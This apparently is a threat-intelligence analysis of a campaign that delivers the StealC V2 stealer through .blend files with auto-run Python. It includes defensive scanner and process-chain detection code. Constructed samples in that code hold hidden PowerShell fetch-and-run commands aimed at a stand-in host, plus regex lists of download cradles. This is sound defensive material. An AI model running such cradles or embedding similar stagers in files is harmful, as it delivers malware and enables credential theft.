Full Report
Cybersecurity researchers have disclosed details of a new campaign that has leveraged Blender Foundation files to deliver an information stealer known as StealC V2. "This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader," Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News. "Users unknowingly
Analysis Summary
# Tool/Technique: StealC V2 via Malicious .blend Files
## Overview
StealC V2 is a new version of an information stealer malware deployed in an ongoing campaign that exploits the functionality of Blender Foundation (.blend) files. Attackers upload poisoned 3D asset files to sharing platforms, relying on users to enable the "Auto Run" feature in Blender to execute embedded malicious Python scripts, leading to data exfiltration.
## Technical Details
- Type: Malware family (Information Stealer, V2 variant)
- Platform: Windows (the stager hands off to PowerShell and the payloads are Windows binaries; Blender itself is cross-platform, so the `.blend` lure opens on any OS, but the payload chain only completes on Windows).
- Capabilities: Information gathering from browsers, extensions, cryptocurrency wallets, messaging apps, VPNs, and email clients.
- First Seen: Operation active for at least six months prior to disclosure (late 2025). StealC V2 variant announced in late April 2025.
## MITRE ATT&CK Mapping
- TA0009 - Collection
- T1005 - Data from Local System
- T1555 - Credentials from Password Stores (Implied, based on targeting password stores/browsers)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.006 - Command and Scripting Interpreter: Python
- T1204.002 - User Execution: Malicious File
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Implied: the stager is carried inside a binary asset container rather than shipped as a visible script)
- TA0011 - Command and Control
- T1105 - Ingress Tool Transfer (the PowerShell stage downloads the two ZIP archives carrying StealC V2 and the secondary stealer)
## Functionality
### Core Capabilities
- **Initial Vector:** A Python script stored as a text datablock inside the `.blend` file, named `Rig_Ui.py` so it passes for a rig UI helper. Blender runs such embedded scripts on file load only when its "Auto Run Python Scripts" preference is enabled, so the lure abuses an intended feature and depends on that setting rather than on a Blender vulnerability.
- **Staging/Execution:** Upon opening the malicious file, an embedded Python script executes, which subsequently fetches a PowerShell script.
- **Payload Delivery:** The PowerShell script downloads two ZIP archives containing the StealC V2 payload and a secondary Python-based stealer.
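The stager in the chain above lives in a text datablock inside the asset, so it can be found without ever opening the file in Blender. The following is an added example, not Morphisec's tooling or Blender project code: it walks the `.blend` container (a 12-byte header, then file blocks each headed by code, size, old pointer, SDNA index and count), lists the embedded text datablocks (ID code "TX"), and greps every block payload for strings a downloader needs but a rig/UI helper does not. It assumes the classic header layout used through Blender 4.x; gzip-compressed saves are handled, zstd-compressed ones are reported rather than misparsed. The sample file it builds is constructed for the demonstration and is not a real malicious asset.

```python
"""Offline triage of a .blend file for embedded Python text datablocks.

Added example; not Morphisec's tooling or Blender code. Assumes the classic
12-byte header ("BLENDER", pointer-size char, endianness char, 3-digit
version) and the classic file-block header (code, size, old pointer, SDNA
index, count). Text datablocks carry ID code "TX"; their lines are stored in
the DATA blocks that follow, which is why every payload is scanned.
"""
import gzip
import re
import struct

# Strings typical of a stager that hands off to PowerShell or pulls a second
# stage; none of them belongs in a character-rig UI script.
SUSPICIOUS = [
    rb"subprocess", rb"powershell", rb"os\.system", rb"os\.popen",
    rb"urllib", rb"requests\.", rb"base64", rb"exec\(", rb"eval\(",
    rb"ctypes", rb"bpy\.app\.handlers",
]
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"


def load_blend_bytes(data: bytes) -> bytes:
    """Return raw .blend bytes, transparently un-gzipping older compressed saves."""
    if data[:2] == b"\x1f\x8b":
        data = gzip.decompress(data)
    elif data[:4] == ZSTD_MAGIC:
        raise ValueError("zstd-compressed .blend (Blender 3.0+): decompress first")
    if data[:7] != b"BLENDER" or not data[9:12].isdigit():
        raise ValueError("not a classic .blend header")
    return data


def iter_blocks(data: bytes):
    """Yield (block_code, payload) for each file block in the container."""
    ptr_size = 8 if data[7:8] == b"-" else 4      # '-' 64-bit pointers, '_' 32-bit
    endian = "<" if data[8:9] == b"v" else ">"    # 'v' little-endian, 'V' big-endian
    hdr_len = 16 + ptr_size                       # code(4) size(4) oldptr(p) sdna(4) count(4)
    off = 12
    while off + hdr_len <= len(data):
        code = data[off:off + 4]
        (size,) = struct.unpack(endian + "I", data[off + 4:off + 8])
        yield code, data[off + hdr_len:off + hdr_len + size]
        if code == b"ENDB":
            break
        off += hdr_len + size


def triage(data: bytes) -> dict:
    """List embedded text datablocks and suspicious strings found in any block."""
    data = load_blend_bytes(data)
    texts, hits = [], set()
    for code, payload in iter_blocks(data):
        if code[:2] == b"TX":
            # The ID name is stored with its two-letter code prefix, e.g. "TXRig_Ui.py\0".
            m = re.search(rb"TX([\x20-\x7e]{1,63}?)\x00", payload)
            texts.append(m.group(1).decode() if m else "<unnamed>")
        for pat in SUSPICIOUS:
            if re.search(pat, payload):
                hits.add(pat.decode().replace("\\", ""))
    verdict = "review" if texts and hits else "ok"
    return {"text_blocks": texts, "suspicious": sorted(hits), "verdict": verdict}


def _block(code: bytes, payload: bytes) -> bytes:
    """Serialise one file block in the 64-bit little-endian layout."""
    return (code.ljust(4, b"\x00") + struct.pack("<I", len(payload))
            + b"\x00" * 8 + struct.pack("<ii", 0, 1) + payload)


def build_sample_blend(malicious: bool = True, compress: bool = False) -> bytes:
    """Constructed test input, not a real sample: a minimal .blend with one text
    datablock named Rig_Ui.py, either a harmless panel stub or a PowerShell
    hand-off of the kind the campaign's stager performs."""
    if malicious:
        lines = [b"import subprocess",
                 b"subprocess.Popen(['powershell', '-w', 'hidden', '-c',"
                 b" 'iwr http://example.invalid/stage.ps1 | iex'])"]
    else:
        lines = [b"import bpy", b"class RIG_PT_panel(bpy.types.Panel): pass"]
    out = b"BLENDER-v305" + _block(b"TX", b"\x00" * 40 + b"TXRig_Ui.py".ljust(66, b"\x00"))
    for line in lines:
        out += _block(b"DATA", line + b"\x00")
    out += _block(b"ENDB", b"")
    return gzip.compress(out) if compress else out


if __name__ == "__main__":
    print(triage(build_sample_blend()))
    print(triage(build_sample_blend(malicious=False)))
```

Run `triage(open(path, "rb").read())` over a download directory to get a quick first cut; a "review" verdict means the asset ships a script that does more than draw panels and should be read before the file is ever opened with auto-run enabled. Every embedded text datablock is reported, because a benign name such as `Rig_Ui.py` is exactly what this campaign chose.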
### Advanced Features
- **Broad Data Harvesting:** StealC V2 specifically supports gathering data from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.
- **Evasion:** Blender is normally run on artists' physical workstations with discrete GPUs, which automated sandboxes and analysis VMs rarely emulate; delivering the stager inside a `.blend` therefore biases execution toward real hosts and away from analysis environments.
- **Secondary Payload:** Deployment of a secondary Python-based stealer alongside the main StealC V2 payload.
## Indicators of Compromise
- File Hashes: Not provided in the context.
- File Names: `Rig_Ui.py` (embedded script name).
- Registry Keys: Not provided in the context.
- Network Indicators: Not explicitly provided, but involves downloading resources via PowerShell to acquire zipped payloads (C2 communication is implied but details are absent).
- Behavioral Indicators: Automatic execution of embedded Python scripts within Blender when opening `.blend` files with Auto Run enabled. Subsequent execution of PowerShell scripts for downloading external archives.
## Associated Threat Actors
- Similarities noted with a prior campaign linked to **Russian-speaking threat actors**. (The specific group deploying StealC V2 in this campaign is not explicitly named, only tactical links are drawn).
## Detection Methods
- Signature-based detection: Signatures for the StealC V2 binaries and the secondary Python stealer catch the final stages; the `.blend` lure itself is a binary container, so the embedded `Rig_Ui.py` text datablock has to be extracted and scanned as Python rather than matched by file type.
- Behavioral detection: Process lineage is the highest-value telemetry. Blender's Python runs inside `blender.exe`, so a `powershell.exe` (or `cmd.exe`) child of `blender.exe`, especially with download cmdlets or hidden-window switches on its command line, followed by ZIP archives written to a temp directory by that child, is the chain described in this campaign and should alert.
- YARA rules: Not provided in the context.
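The behavioral chain in the Detection Methods list maps directly onto endpoint telemetry. The following is an added example, not Morphisec's or Blender's code: two rules run over Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records, flagging a script interpreter spawned by `blender.exe` and a ZIP written by that child. The field names follow Sysmon; the events, paths and process GUIDs are constructed for the demonstration.

```python
"""Behavioural detection for the blender.exe -> powershell.exe -> ZIP chain.

Added example, not Morphisec's or Blender's code. Rule 1: blender.exe spawns
a script interpreter (Blender's embedded Python runs in-process, so any such
child came from a script). Rule 2: a ZIP written by one of those children,
tying the stage-2 download to its suspicious parent. Field names follow
Sysmon Event ID 1 and 11; the records below are constructed, not real logs.
"""
import ntpath
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download cradles and "quiet" switches that an artist's rig script never needs.
CRADLE = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
                    r"start-bitstransfer|\bcurl\b|\bwget\b|\biex\b|invoke-expression")
QUIET = re.compile(r"(?i)-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-noni\b|"
                   r"executionpolicy\s+bypass")

# Constructed sample telemetry: a benign Blender launch, the malicious child,
# its dropped archive, and an unrelated admin PowerShell that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe",
     "CommandLine": r'"blender.exe" C:\Users\artist\Downloads\character_rig.blend'},
    {"EventID": 1, "ProcessGuid": "{B2}",
     "ParentImage": r"C:\Program Files\Blender Foundation\Blender 4.2\blender.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c \"iwr http://example.invalid/s.ps1"
                    " -OutFile $env:TEMP\\s.ps1; & $env:TEMP\\s.ps1\""},
    {"EventID": 11, "ProcessGuid": "{B2}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\artist\AppData\Local\Temp\stage2.zip"},
    {"EventID": 1, "ProcessGuid": "{C3}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users\\artist\\Downloads"},
]


def detect(events):
    """Return (rule, process_guid, detail) tuples for every matching record."""
    alerts = []
    blender_children = set()   # GUIDs of interpreters spawned by blender.exe
    for ev in events:
        if ev["EventID"] == 1:
            child = ntpath.basename(ev["Image"]).lower()
            parent = ntpath.basename(ev["ParentImage"]).lower()
            if parent == "blender.exe" and child in INTERPRETERS:
                blender_children.add(ev["ProcessGuid"])
                cmd = ev["CommandLine"]
                # Lineage alone is medium; a cradle or hidden-window switch makes it high.
                severity = "high" if (CRADLE.search(cmd) or QUIET.search(cmd)) else "medium"
                alerts.append(("blender_spawns_interpreter", ev["ProcessGuid"], f"{severity}: {cmd}"))
        elif ev["EventID"] == 11:
            if ev["ProcessGuid"] in blender_children and ev["TargetFilename"].lower().endswith(".zip"):
                alerts.append(("archive_dropped_by_blender_child", ev["ProcessGuid"], ev["TargetFilename"]))
    return alerts


if __name__ == "__main__":
    for rule, guid, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {guid} {detail}")
```

Keying rule 2 on the GUIDs collected by rule 1 is what keeps it quiet: a ZIP written by a PowerShell session that an administrator started from Explorer is ordinary, the same write by a PowerShell that `blender.exe` launched is the campaign's second stage.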
## Mitigation Strategies
- **Disable Auto Run:** Leave Blender's "Auto Run Python Scripts" preference (Edit > Preferences > Save & Load) off, which is its default, unless the file source is explicitly trusted; Blender then skips embedded scripts on load and shows a warning banner instead. Do not click "Allow Execution" on that banner for a downloaded asset. For render farms and automation, start Blender with `--disable-autoexec` (`-Y`) so scripts stay off for that session regardless of the saved preference.
- **Source Trust:** Only open 3D model files from verified and trusted sources.
- **Limit Execution Context:** Open marketplace assets on an isolated workstation or VM that holds no browser profiles, wallets, or messaging sessions, since those stores are exactly what StealC V2 harvests; a compromise in that context then yields little.
## Related Tools/Techniques
- StealC (Original variant)
- Pyramid C2 (Associated with the previously linked campaign)
- Use of decoy documents/files to lure users into executing code (General tactic).